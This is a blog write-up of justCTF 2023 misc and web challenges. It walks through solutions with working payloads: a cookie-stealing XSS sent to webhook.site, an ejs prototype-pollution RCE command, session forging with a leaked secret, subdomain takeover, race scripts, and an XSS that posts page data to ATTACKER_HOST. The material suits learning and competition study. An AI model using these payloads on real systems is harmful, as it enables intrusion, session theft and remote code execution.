justCTF 2023 WriteUps
This article is automatically translated by LLM, so the translation may be inaccurate or incomplete. If you find any mistake, please let me know.
You can find the original article here .
This week I solved some web and misc challenges with the TSJ team.
Misc
ECC for Dummies
This challenge randomly generates some booleans (cards
), and then asks you some questions about those booleans (using cards[i]
in a python expression, filtered by AST). However, it deliberately gives incorrect answers to a few questions, so the ECC in the challenge title likely refers to Error Correcting Code.
But since len(cards) == 5
in this challenge, simply submitting 0 0 0 0 0
as the answer has a 1/32 chance of being correct, so brute-forcing it works.
while true; do echo '1\n1\n1\n1\n1\n1\n1\n1\n0 0 0 0 0\n' | nc eccfordummies.nc.jctf.pro 1337 | grep flag; done
# justCTF{S0me7ime$_L0Gic_1s_n0T_B1n4ry_0101}
Later, I found out that the AST filtering part was poorly implemented, so simply using breakpoint()
would bypass it XD.
ECC not only for Dummies
This challenge added PoW and modified some parts, but the AST filtering part was still poorly implemented, so using breakpoint()
would bypass it XD.
breakpoint()
open('flag.txt').read()
# justCTF{S4nd_S0metim3s_It$_EvEn_$0lv4ble}
For a serious version of an Error Correcting Code challenge, refer to WMCTF's nanoDiamond(-rev)
PyPlugins
#!/usr/bin/env python3.10
import dis
import os
import sys
import re
import runpy
import py_compile
import requests
PLUGINS_PATH = "/plugins/"
TRUSTED_DOMAINS = [
'blackhat.day',
'veganrecipes.soy',
'fizzbuzz.foo',
]
def banner():
print("1. List known websites")
print("2. List plugins")
print("3. Download plugin")
print("4. Load plugin")
print("5. Exit")
def list_known_websites():
print("great.veganrecipes.soy")
print("uplink.blackhat.day")
print("plugandplay.fizzbuzz.foo")
def list_plugins():
print("Plugins:")
for f in os.listdir(PLUGINS_PATH):
print(f" {f}")
PATH_RE = re.compile(r"^[A-Za-z0-9_]+$")
MAX_SIZE = 4096
def _get_file(url):
with requests.get(url, stream=True) as r:
r.raise_for_status()
chunks = 0
for chunk in r.iter_content(chunk_size=4096):
return chunk
raise Exception("")
def download_plugin():
print("Provide plugin url in a form of A.B.C where A,B,C must be [A-Za-z0-9_]+")
url = input("url: ").strip()
try:
a, b, c = url.split(".")
if not all(PATH_RE.match(x) for x in (a, b, c)):
print("FAIL:",a,b,c)
raise Exception()
except:
print("ERR: Invalid url format. Cannot download plugin.")
return
domain = f"{b}.{c}"
if domain not in TRUSTED_DOMAINS:
print("ERR: Domain not trusted. Aborting.")
return
url = f"https://{a}.{b}.{c}/"
try:
code = _get_file(url).decode()
# Validate plugin code
cobj = test_expr(code, ALLOWED_OPCODES)
# Constants must be strings!
assert all(type(c) in (str, bytes, type(None)) for c in cobj.co_consts)
except Exception as e:
print(f"ERR: Couldnt get plugin or plugin is invalid. Aborting.")
return
# TODO/FIXME: So far our plugins will just print global strings
# We should make it more powerful in the future, but at least it is secure for now
code += '\nx = [i for i in globals().items() if i[0][0]!="_"]\nfor k, v in x: print(f"{k} = {v}")'
with open(f"{PLUGINS_PATH}/{a}_{b}.py", "w") as f:
f.write(code)
### Code copied from Pwntools safeeval lib
# see https://github.com/Gallopsled/pwntools/blob/c72886a9b9/pwnlib/util/safeeval.py#L26-L67
# we did a small modification: we pass 'exec' instead of 'eval' to `compile`
def _get_opcodes(codeobj):
if hasattr(dis, 'get_instructions'):
return [ins.opcode for ins in dis.get_instructions(codeobj)]
i = 0
opcodes = []
s = codeobj.co_code
while i < len(s):
code = six.indexbytes(s, i)
opcodes.append(code)
if code >= dis.HAVE_ARGUMENT:
i += 3
else:
i += 1
return opcodes
def test_expr(expr, allowed_codes):
allowed_codes = [dis.opmap[c] for c in allowed_codes if c in dis.opmap]
try:
c = compile(expr, "", "exec")
except SyntaxError as ex:
print(ex)
raise ValueError("%r is not a valid expression" % expr)
codes = _get_opcodes(c)
for code in codes:
if code not in allowed_codes:
raise ValueError("opcode %s not allowed" % dis.opname[code])
return c
ALLOWED_OPCODES = ["LOAD_CONST", "STORE_NAME", "RETURN_VALUE"]
def load_plugin():
"""
Loads the plugin performing various sanity checks.
A plugin must only define strings in it.
"""
plugin = input("plugin: ").strip()
if not PATH_RE.match(plugin):
print("Invalid plugin name. Aborting.")
return
plugin_path = f"{PLUGINS_PATH}/{plugin}.py"
if not os.path.exists(plugin_path):
print("Path not found: %s" % plugin_path)
return
# We validated the plugin when we downloaded it
# so it must be secure to run it now: it should just print globals.
runpy.run_path(py_compile.compile(plugin_path))
funcs = {
1: list_known_websites,
2: list_plugins,
3: download_plugin,
4: load_plugin,
5: sys.exit
}
def main():
print("Welcome to the PyPlugins challenge!")
print("We will load your Python plugins, but only if they are hosted on a trusted website and if they cannot harm us.")
while True:
banner()
n = input('> ')
try:
n = int(n)
func = funcs[n]
except:
print("Wrong input. Try again")
continue
try:
func()
except Exception as e:
print(f"Faild")
raise
if __name__ == '__main__':
main()
In short, this challenge allows downloading and executing plugins from specified domains, but only allows executing LOAD_CONST
, STORE_NAME
, and RETURN_VALUE
opcodes, similar to pyjail.
First, to bypass the domain restriction, digging into the subdomains of those domains reveals that they are essentially wildcard CNAMEs to GitHub Pages.
*.blackhat.day
->whateverherebecausewhocares.github.io
*.veganrecipes.soy
->dc3dtest.github.io
*.fizzbuzz.foo
->howdoesthiswork.github.io
So, subdomain takeover is possible.
The method is simple. For example, if my target is to take over maple.blackhat.day
, I create a repo under my account named whateverherebecausewhocares.github.io
, then place a CNAME
file with the content maple.blackhat.day
. After that, go to the repo settings' pages, and after a while, the takeover will be successful.
Next is the pyjail part. I noticed that the expr
in compile(expr, "", "exec")
is a str
, but when written to a file and executed, it is treated as bytes
. Python accepts #coding: ...
comments when the source code is of bytes
type, so I used this to bypass:
#coding: raw_unicode_escape
x='PEKO\u0027\u002b\u0062\u0072\u0065\u0061\u006b\u0070\u006f\u0069\u006e\u0074\u0028\u0029\u002b\u0027'
However, the flag was justCTF{GitHub_P4g3s_Subd0ma1ns_And_Z1pp3d_Pycs_Ar3_Cr4zy!}
, so it was not the intended solution XD.
The intended solution was a CPython 0day (?): py/pyc/zip file type confusion
In short, Python can accept zip files as input (refer to zipapp), and the internal mechanism is similar to regular zip decompression, looking for the end of the central directory, etc. On the other hand, CPython has pyc files containing some headers and code objects, which have co_consts
.
So, if you have a Python file with a long byte literal containing a zip, it will be expanded directly when compiled into pyc. When executed, CPython will mistakenly recognize it as a zip due to the zip signature. For more details, refer to this.
Python Zip confusion: POC
Web
eXtra Safe Security layers
The core part of this challenge is this code:
app.use((req, res, next) => {
if (req.query) {
// Saferty layer 2
const s = JSON.stringify(req.query).toLowerCase();
for (const b of blacklist) {
if (s.includes(b.toLowerCase())) {
return res.status(403).send("You are not allowed to do that.");
}
}
// Safety layer 3
for (const c of s) {
if (c.charCodeAt(0) > 127 || c.charCodeAt(0) < 32) {
return res.status(403).send("You are not allowed to do that.");
}
}
}
if (req.cookies?.admin === adminCookie) {
res.user = {
isAdmin: true,
text: "Welcome back :)",
unmodifiable: {
background: "admin_background.png",
CSP: `default-src 'self'; img-src 'self'; style-src '${css}'; script-src '${adminJs}' '${commonJs}';`,
},
};
} else {
// Safety layer 4
res.user = {
text: "Hi! You can modify this text by visiting `?text=Hi`. But I must warn you... you can't have html tags in your text.",
unmodifiable: {
background: "background.png",
},
};
}
if (req.query.text) {
res.user = { ...res.user, ...req.query };
}
// Safety layer 5
res.set("Content-Security-Policy", res.user.unmodifiable.CSP ?? defaultCSP);
next();
});
And the ejs template part has this:
<script>
// load background...
main.innerHTML += `
<img class='background' src='<%- unmodifiable?.background %>'>
`;
console.log('Loaded!');
</script>
The blacklist
part includes some common js functions like alert
, eval
, etc., which are easy to bypass. The main key is res.user = { ...res.user, ...req.query }
, where you can use a query string to create an object that overrides the unmodifiable
part, allowing you to change CSP
and background
, and inject code directly into background
.
http://xssl.web.jctf.pro/?text=a&unmodifiable[CSP]=a&unmodifiable[background]=`;location.assign(%27https://webhook.site/XXXXX?%27%2Bdocument.cookie);`
Dangerous
require "sinatra"
require "sqlite3"
require "erubi"
require "digest"
require "json"
config = JSON.parse(File.read("./config.json"))
set :bind, '0.0.0.0'
enable :sessions
set :erb, :escape_html => true
con = SQLite3::Database.new "sqlite.db"
con.execute "CREATE TABLE IF NOT EXISTS threads(
id INTEGER PRIMARY KEY AUTOINCREMENT,
content TEXT,
ip TEXT,
username TEXT
);"
con.execute "CREATE TABLE IF NOT EXISTS replies(
id INTEGER PRIMARY KEY AUTOINCREMENT,
content TEXT,
ip TEXT,
username TEXT,
thread_id INTEGER
);"
def get_threads(con)
return con.execute("SELECT * FROM threads ORDER BY id DESC;")
end
def get_replies(con, id)
return con.execute("SELECT *, null, 0 as p FROM threads WHERE id=?
UNION SELECT *, 1 as p FROM replies WHERE thread_id=? order by p", [id, id])
end
def is_allowed_ip(username, ip, config)
return config["mods"].any? {
|mod| mod["username"] == username and mod["allowed_ip"] == ip
}
end
get "/" do
@threads = get_threads(con)
erb :index
end
post "/thread" do
if params[:content].nil? or params[:content] == "" then
raise "Thread content cannot be empty!"
end
if session[:username] then
username = is_allowed_ip(session[:username], request.ip, config) ? session[:username] : nil
end
# === temporarily disabled ===
# con.execute("INSERT INTO threads (id, content, ip, username)
# VALUES (?, ?, ?, ?)", [nil, params[:content], request.ip, username])
redirect to("/#{con.execute('SELECT last_insert_rowid()')[0][0]}")
end
get "/flag" do
if !session[:username] then
erb :login
elsif !is_allowed_ip(session[:username], request.ip, config) then
return [403, "You are connecting from untrusted IP!"]
else
return config["flag"]
end
end
post "/login" do
if config["mods"].any? {
|mod| mod["username"] == params[:username] and mod["password"] == params[:password]
} then
session[:username] = params[:username]
redirect to("/flag")
else
return [403, "Incorrect credentials"]
end
end
get "/:id" do
@id = params[:id]
@replies = get_replies(con, @id)
erb :thread
end
post "/:id" do
if params[:content].nil? or params[:content] == "" then
raise "Reply content cannot be empty!"
end
if session[:username] then
username = is_allowed_ip(session[:username], request.ip, config) ? session[:username] : nil
end
@id = params[:id]
# === temporarily disabled ===
# con.execute("INSERT INTO replies (id, content, ip, username, thread_id)
# VALUES (?, ?, ?, ?, ?)", [nil, params[:content], request.ip, username, @id])
redirect to("/#{@id}")
end
A ruby challenge, executed directly with ruby dangerous.rb
. Sending an empty content POST /thread
results in an error page, revealing that it runs in debug mode, allowing you to find the session secret on the page.
Having the session secret means you can modify the cookie at will, and it uses ruby Marshal.load
for deserialization. However, in this Ruby 3.2 version, the payloads I found via Google did not work, so I only used it to modify session[:username]
.
From the provided website, we know the admin's username is janitor
, and there are two threads with admin comments. The thread.erb
contains:
<% @replies.each do |reply| %>
<div style="padding-bottom: 1rem">
<% user_color = Digest::SHA256.hexdigest(reply[2] + @id).slice(0, 6) %>
<div style="color: #<%= user_color %>;">
<%= user_color %>
<% if reply[3] %>
<span style="color: #ff0000;">##Admin:<%= reply[3] %>##</span>
<% end %>
</div>
<div><%= reply[1] %></div>
</div>
<% end %>
So, we know sha256(admin_ip + '1')[:6]
and sha256(admin_ip + '2')[:6]
, and since the ipv4 space is small, we can brute-force it:
from hashlib import sha256
from concurrent.futures import ProcessPoolExecutor
def task(a):
print(f"{a} started")
for b in range(256):
for c in range(256):
for d in range(256):
ip = f"{a}.{b}.{c}.{d}"
h1 = sha256((ip + "1").encode()).hexdigest()[:6]
h2 = sha256((ip + "2").encode()).hexdigest()[:6]
if h1 == "32cae2" and h2 == "92e1e8":
print(ip)
with ProcessPoolExecutor(max_workers=8) as executor:
for a in range(256):
executor.submit(task, a)
The resulting IP is 10.24.170.69
, so modifying the session and faking the IP with X-Forwarded-For
allows us to get the flag.
import hashlib, hmac, base64
from urllib.parse import quote, unquote
from Crypto.Cipher import AES
from subprocess import check_output
import requests
import os
sess = unquote(requests.get("http://dangerous.web.jctf.pro/flag").cookies["rack.session"])
print(sess)
secret = "a9316e61bc75029d52f915823d7bb628a4adae8b174bce89fd38ec4c7fb925a07e2ccbc01572b9fdce56502ef5d02609e5194a5ddd649ff349a206002e96a99d"
key = bytes.fromhex(secret)[:32]
ct, iv, auth = map(base64.b64decode, sess.split("--"))
cipher = AES.new(key, AES.MODE_GCM, nonce=iv)
hh = cipher.decrypt_and_verify(ct, auth).hex()
out = check_output(
["ruby"],
input=f"""
hex_data = "{hh}"
data = [hex_data].pack("H*")
r = Marshal.load(data)
puts r
r["username"] = "janitor"
puts r
puts Marshal.dump(r).unpack("H*")[0]
""".encode(),
).decode()
print(out)
pt = bytes.fromhex(out.split("\n")[-2])
iv = os.urandom(len(iv))
cipher = AES.new(key, AES.MODE_GCM, nonce=iv)
ct, auth = cipher.encrypt_and_digest(pt)
sess = b"--".join(map(base64.b64encode, [ct, iv, auth])).decode()
print(sess)
r = requests.get(
"http://dangerous.web.jctf.pro/flag",
cookies={"rack.session": quote(sess)},
headers={"X-Forwarded-For": "10.24.170.69"},
)
print(r.text)
# justCTF{1_th1nk_4l1ce_R4bb1t_m1ght_4_4_d0g}
Perfect Product
This challenge uses ejs 3.1.9, and the core part of the code is:
app.all('/product', (req, res) => {
const params = req.query || {};
Object.assign(params, req.body || {});
let name = params.name
let strings = params.v;
if(!(strings instanceof Array) && !Array.isArray(strings)){
strings = ['NaN', 'NaN', 'NaN', 'NaN', 'NaN'];
}
// make _0 to point to all strings, copy to prevent reference.
strings.unshift(Array.from(strings));
const data = {};
for(const idx in strings){
data[`_${idx}`] = strings[idx];
}
if(typeof name !== 'string'){
name = `Product: NaN`;
}else{
name = `Product: ${name}`;
}
data['productname'] = name;
data['print'] = !!params.print;
res.render('product', data);
});
The goal is to modify the ejs settings through data and achieve code injection for RCE.
Referencing this, we need data.settings
to have content, which seems impossible from the code alone. However, considering the js prototype mechanism, we can pollute data.__proto__.settings
, so we need to find a way to make strings
not an array.
A simple way to bypass the assignment is to make strings instanceof Array
true, and in js, { __proto__: [] } instanceof Array
is true, so using ?v[__proto__][0]&v[_proto__][x]=0
makes data.__proto__.x === '0'
.
Next, I tried using the payload from this, but found that code injection was troublesome, requiring the options payload and ejs content to match. However, I remembered a similar challenge from FCSC 2023, where I found this gadget:
const payload = {
settings: {
'view options': {
debug: true,
client: true,
escapeFunction: '(() => {});return process.mainModule.require("child_process").execSync("cat /app/flag*").toString()'
}
}
}
Another writeup (in French): FCSC 2023 : Peculiar Caterpillar
The version was also ejs 3.1.9, so I used it directly:
curl -H 'Content-Type: application/json' -g 'http://sy0rdzpzb0mexasqml3bzv9tqtgqo3.perfectproduct.web.jctf.pro/product?v[__proto__][0]&v[2]=1&v[3]=1&v[4]=1' -G --data-urlencode 'v[_proto__][settings][view%20options][debug]=true' --data-urlencode 'v[_proto__][settings][view%20options][client]=true' --data-urlencode 'v[_proto__][settings][view%20options][escapeFunction]=(() => {});return process.mainModule.require("child_process").execSync("/readflag").toString()' --data-urlencode 'v[_proto__][cache]='
# justCTF{found_the_bug_myself_but_i_guess_people_like_to_report_0days_publicly}
Although this kind of bug (?) is now considered out-of-scope by ejs: Out-of-Scope Vulnerabilities, so it won't be fixed.
Aquatic Delights
#!/usr/bin/env python
import flask
import json
import sqlite3
from os import getenv
app = flask.Flask(__name__, static_url_path='/static')
DATABASE = None
def database_connection(func):
def wrapper(self, *args, **kwargs):
with sqlite3.connect('/tmp/shop.db') as con:
if hasattr(self, 'locked') and self.locked:
return flask.jsonify({'result': 'NG', 'reason': 'Database is locked!'}), 500
try:
return func(self, con.cursor(), *args, **kwargs)
except Database.Error as ex:
return flask.jsonify({'result': 'NG', 'reason': str(ex)}), 500
except:
return flask.abort(500, 'Something went wrong')
return wrapper
def database_lock(func):
def wrapper(self, *args, **kwargs):
try:
self.locked = True
result = func(self, *args, **kwargs)
except:
raise
finally:
self.locked = False
return result
return wrapper
class Database(object):
@database_connection
def __init__(self, cur):
self.just_coins = 10
cur.execute("DROP TABLE IF EXISTS shop")
cur.execute("CREATE TABLE shop(name, price, available)")
shop_data = [
('Catfish', 1, 10),
('Rainbow Guppy', 5, 5),
('Koi Carp', 20, 3),
('Royal Angelfish', 100, 1),
('Flagfish', 1337, 1)
]
cur.executemany("INSERT INTO shop(name, price, available) VALUES(?, ?, ?)", shop_data)
cur.execute("DROP TABLE IF EXISTS inventory")
cur.execute("CREATE TABLE inventory(name, available)")
cur.executemany("INSERT INTO inventory(name, available) VALUES(?, ?)",
[
(name, 0) for name, _, _ in shop_data
]
)
def _get_shop(self, cur, name=None):
if name is None:
return {x[0]: x[1:] for x in cur.execute("SELECT * FROM shop")}
else:
cur.execute("SELECT price, available FROM shop WHERE name = ?", (name,))
return cur.fetchone()
def _get_inventory(self, cur, name=None):
if name is None:
return {x[0]: x[1] for x in cur.execute("SELECT * FROM inventory")}
else:
cur.execute("SELECT available FROM inventory WHERE name = ?", (name,))
return cur.fetchone()[0]
def _update_shop(self, cur, name, available):
cur.execute("UPDATE shop SET available = ? WHERE name = ?", (available, name))
def _update_inventory(self, cur, name, available):
cur.execute("UPDATE inventory SET available = ? WHERE name = ?", (available, name))
def _get_shop_data(self, cur):
data = {}
shop = self._get_shop(cur)
inventory = self._get_inventory(cur)
for name, item in shop.items():
data[name.replace(' ', '_')] = {
'price': item[0],
'available': item[1],
'eat': inventory.get(name)
}
return data
class Error(Exception):
pass
@database_connection
@database_lock
def buy(self, cur, name, amount):
shop_price, shop_available = self._get_shop(cur, name)
inv_available = self._get_inventory(cur, name)
if shop_available == 0: raise Database.Error('There is no more item of this type in shop')
if amount <= 0 or amount > 0xffffffff: raise Database.Error('Invalid amount')
if shop_available < amount: raise Database.Error('Not enough items in shop')
total_price = shop_price * amount
if total_price > self.just_coins: raise Database.Error('Not enough justCoins')
self.just_coins -= total_price
self._update_inventory(cur, name, inv_available + amount)
self._update_shop(cur, name, shop_available - amount)
return flask.jsonify({'result': 'OK', 'response': f'Successfully bought {amount} {name}',
'justCoins': DATABASE.just_coins, 'data': self._get_shop_data(cur)})
@database_connection
@database_lock
def sell(self, cur, name, amount):
inv_available = self._get_inventory(cur, name)
if inv_available < amount: raise Database.Error('Not enough items in inventory')
if amount <= 0 or amount > 0xffffffff: raise Database.Error('Invalid amount')
shop_price, shop_available = self._get_shop(cur, name)
total_price = shop_price * amount
self.just_coins += total_price
self._update_inventory(cur, name, inv_available - amount)
self._update_shop(cur, name, shop_available + amount)
return flask.jsonify({'result': 'OK', 'response': f'Successfully sold {amount} {name}',
'justCoins': DATABASE.just_coins, 'data': self._get_shop_data(cur)})
@database_connection
def eat(self, cur, name):
inv_available = self._get_inventory(cur, name)
if inv_available <= 0: raise Database.Error('Not enough items in inventory')
self._update_inventory(cur, name, inv_available - 1)
if name == 'Flagfish':
response = getenv("FLAG")
else:
response = 'Nothing happened'
return flask.jsonify({'result': 'OK', 'response': response, 'justCoins': DATABASE.just_coins,
'data': self._get_shop_data(cur)})
@database_connection
def get_table(self, cur):
return flask.render_template('table.html', inv=DATABASE._get_inventory(cur), shop=DATABASE._get_shop(cur))
@database_connection
def get_inventory(self, cur=None):
return self._get_inventory(cur)
@database_connection
def get_shop(self, cur=None):
return self._get_shop(cur)
@app.route('/', methods=['GET'])
def index():
return flask.render_template('index.html', just_coins=DATABASE.just_coins, inv=DATABASE.get_inventory(), shop=DATABASE.get_shop())
@app.route('/api/buy', methods=['POST'])
def api_buy():
try:
data = json.loads(flask.request.data)
assert isinstance(data['name'], str)
assert isinstance(data['amount'], int)
except:
return flask.abort(400, 'Invalid request')
return DATABASE.buy(data['name'], data['amount'])
@app.route('/api/sell', methods=['POST'])
def api_sell():
try:
data = json.loads(flask.request.data)
assert isinstance(data['name'], str)
assert isinstance(data['amount'], int)
except:
return flask.abort(400, 'Invalid request')
return DATABASE.sell(data['name'], data['amount'])
@app.route('/api/eat', methods=['POST'])
def api_eat():
try:
data = json.loads(flask.request.data)
assert isinstance(data['name'], str)
except:
return flask.abort(400, 'Invalid request')
return DATABASE.eat(data['name'])
@app.route('/reset', methods=['GET'])
def reset():
DATABASE.__init__()
return flask.redirect("/")
if __name__ == '__main__':
DATABASE = Database()
app.run(host="0.0.0.0", port=8080)
A standard shop app, but both buy and sell have database locks, so theoretically, there should be no race condition.
However, modifying database_connection
to record the current entry count reveals that it doesn't lock the database well:
def database_connection(func):
def wrapper(self, *args, **kwargs):
if getattr(self, 'entry', None) is None:
self.entry = 0
with sqlite3.connect('/tmp/shop.db') as con:
if hasattr(self, 'locked') and self.locked:
return flask.jsonify({'result': 'NG', 'reason': 'Database is locked!'}), 500
try:
self.entry += 1
import sys
print(self.entry, file=sys.stderr)
return func(self, con.cursor(), *args, **kwargs)
except Database.Error as ex:
return flask.jsonify({'result': 'NG', 'reason': str(ex)}), 500
except:
return flask.abort(500, 'Something went wrong')
finally:
self.entry -= 1
return wrapper
Multiple requests can transition between database_connection
and database_lock
, so spamming requests still has a chance to race successfully, albeit with a lower probability than without locks.
So, I wrote a script to brute-force the race, with sell attempts outnumbering buy attempts to increase money:
import requests
from threading import Thread
# host = "http://localhost:8080"
host = "http://lcy5kjz4es4502p3acpac6czn5t4gs.aquatic-sgp1.web.jctf.pro"
def buy(name, amount):
try:
return requests.post(
host + "/api/buy", json={"name": name, "amount": amount}
).json()
except:
pass
def sell(name, amount):
try:
return requests.post(
host + "/api/sell", json={"name": name, "amount": amount}
).json()
except:
pass
def eat(name):
try:
return requests.post(host + "/api/eat", json={"name": name}).json()
except:
pass
def reset():
requests.get(host + "/reset", allow_redirects=False).text
def main():
# tune this according to current total coins
# cur = ("Catfish", 10)
# cur = ("Rainbow Guppy", 3)
# cur = ("Koi Carp", 8)
cur = ("Royal Angelfish", 4)
def bb():
r = buy(*cur)
if r is not None and "justCoins" in r:
tot = r["justCoins"]
for name, d in r["data"].items():
tot += d["price"] * d["eat"]
print("b", r["justCoins"], tot)
def ss():
r = sell(*cur)
if r is not None and "justCoins" in r:
tot = r["justCoins"]
for name, d in r["data"].items():
tot += d["price"] * d["eat"]
print("s", r["justCoins"], tot)
while True:
Thread(target=bb).start()
Thread(target=ss).start()
Thread(target=ss).start()
Thread(target=ss).start()
main()
# justCTF{r4c3_w1nn3r_w1nn3r_ch1ck3n_d1nn3r!}
Phantom
This challenge has a simple account registration system, and after logging in, you can modify your name and description, with the flag in the admin bot's name.
The description is filtered by:
func isSafeHTML(input string) bool {
var buffer bytes.Buffer
tokenizer := html.NewTokenizer(strings.NewReader(input))
for {
tt := tokenizer.Next()
switch {
case tt == html.ErrorToken:
return true
case tt == html.StartTagToken, tt == html.EndTagToken, tt == html.SelfClosingTagToken:
token := tokenizer.Token()
if len(token.Attr) > 0 {
return false
}
switch token.Data {
case "h1", "h2", "h3", "h4", "h5", "h6", "b", "i", "a", "img", "p", "code", "svg", "textarea":
buffer.WriteString(token.String())
default:
return false
}
case tt == html.TextToken:
buffer.WriteString(tokenizer.Token().String())
default:
return false
}
}
}
Seeing <svg>
reminded me that <svg>
parsing mode is similar to xml, and content inside <textarea>
doesn't need to be escaped (RCDATA state). So, <svg><textarea></svg><script>...
should theoretically work, and testing confirmed it.
I knew this because I recently found a similar XSS in Joplin.
Next, I needed to bypass CSRF to log in or modify the profile. Examining the code revealed that profileEdit
(/profile/edit
) was special:
func profileEditHandler(w http.ResponseWriter, r *http.Request) {
if r.Method == http.MethodGet {
session, _ := store.Get(r, "session")
if auth, ok := session.Values["authenticated"].(bool); !ok || !auth {
http.Error(w, "Forbidden", http.StatusForbidden)
return
}
username := session.Values["username"].(string)
if user, ok := Users[username]; ok {
data := map[string]interface{}{
"User": user,
"csrfToken": csrf.Token(r),
}
templates.ExecuteTemplate(w, "edit", data)
} else {
http.Error(w, "Unauthenticated", http.StatusUnauthorized)
return
}
} else {
// handle file upload
session, _ := store.Get(r, "session")
if auth, ok := session.Values["authenticated"].(bool); !ok || !auth {
http.Error(w, "Forbidden", http.StatusForbidden)
return
}
name := r.FormValue("name")
description := r.FormValue("description")
username := session.Values["username"].(string)
if user, ok := Users[username]; ok {
if isSafeHTML(description) {
descriptionHTML, err := html.Parse(strings.NewReader(description))
var buf bytes.Buffer
html.Render(&buf, descriptionHTML)
if err != nil {
http.Error(w, "Forbidden", http.StatusForbidden)
}
if len(name) > 0 {
user.Name = name
}
user.Description = buf.String()
data := map[string]interface{}{
"Name": user.Name,
"Description": template.HTML(user.Description),
}
templates.ExecuteTemplate(w, "profile", data)
} else {
http.Error(w, "Forbidden", http.StatusForbidden)
return
}
}
}
}
The main difference is the use of else for method checking, unlike other handlers: } else if r.Method == http.MethodPost {
. Referencing csrf.go, GET
, HEAD
, OPTIONS
, and TRACE
methods don't check the csrf token, so sending a body with these methods allows modification. Testing with curl confirmed this.
However, I couldn't find a way to send a body with GET
or HEAD
requests using fetch or forms, so I abandoned this approach.
Instead, I used the fact that http://xssl.web.jctf.pro
and https://phantom.web.jctf.pro
belong to the same site, allowing me to modify the cookie from xssl.web.jctf.pro
.
However, document.cookie = 'session=... ;path=/profile; domain=web.jctf.pro'
didn't work for unknown reasons, possibly because the original cookie was Secure
or HttpOnly
. Fortunately, I recently read Cookie Bugs - Smuggling & Injection, learning that document.cookie = '=a=b'
creates a (key, value) = ('', 'a=b')
cookie, which is serialized to Cookie: a=b
(note the missing equals sign between key and value). This is parsed by Go's cookie parsing algorithm as (key, value) = ('a', 'b')
, allowing successful modification of the session cookie.
<script>
const samesiteXSS =
'http://xssl.web.jctf.pro/?text=a&unmodifiable[CSP]=a&unmodifiable[background]=`;location.assign(name);`'
// prepare an account with the following xss payload as description
// <svg><textarea></svg><script>fetch('/profile%2fedit').then(r=>r.text()).then(t=>fetch('https://ATTACKER_HOST/report',{method:'POST',body:t,mode:'no-cors'}))< /script>
// the `%2f` in `/profile%2fedit` is needed or browser will use our provided XSS account session to request it, which doesn't have the flag
// playing with window/iframe references should work too
window.name =
'javascript:' +
encodeURIComponent(`
document.cookie = '=session=MTY4NTg2ODU0OXxEdi1CQkFFQ180SUFBUkFCRUFBQVRQLUNBQUlHYzNSeWFXNW5EQThBRFdGMWRHaGxiblJwWTJGMFpXUUVZbTl2YkFJQ0FBRUdjM1J5YVc1bkRBb0FDSFZ6WlhKdVlXMWxCbk4wY21sdVp3d0xBQWx6ZFhCbGNtNWxibVU9fNgFpBvKntkK07FH7_Zcu0zSesy10P01b20weA_MIt_p;domain=web.jctf.pro;path=/profile'
location = 'https://phantom.web.jctf.pro/profile'
`)
location = samesiteXSS
// justCTF{why_on_earth_does_my_app_handle_HEADs}
</script>
Additionally, I learned post-competition that r.FormValue(key)
also reads from the query string, so CSRF could be done with HEAD /profile/edit?name=&description=XSS
.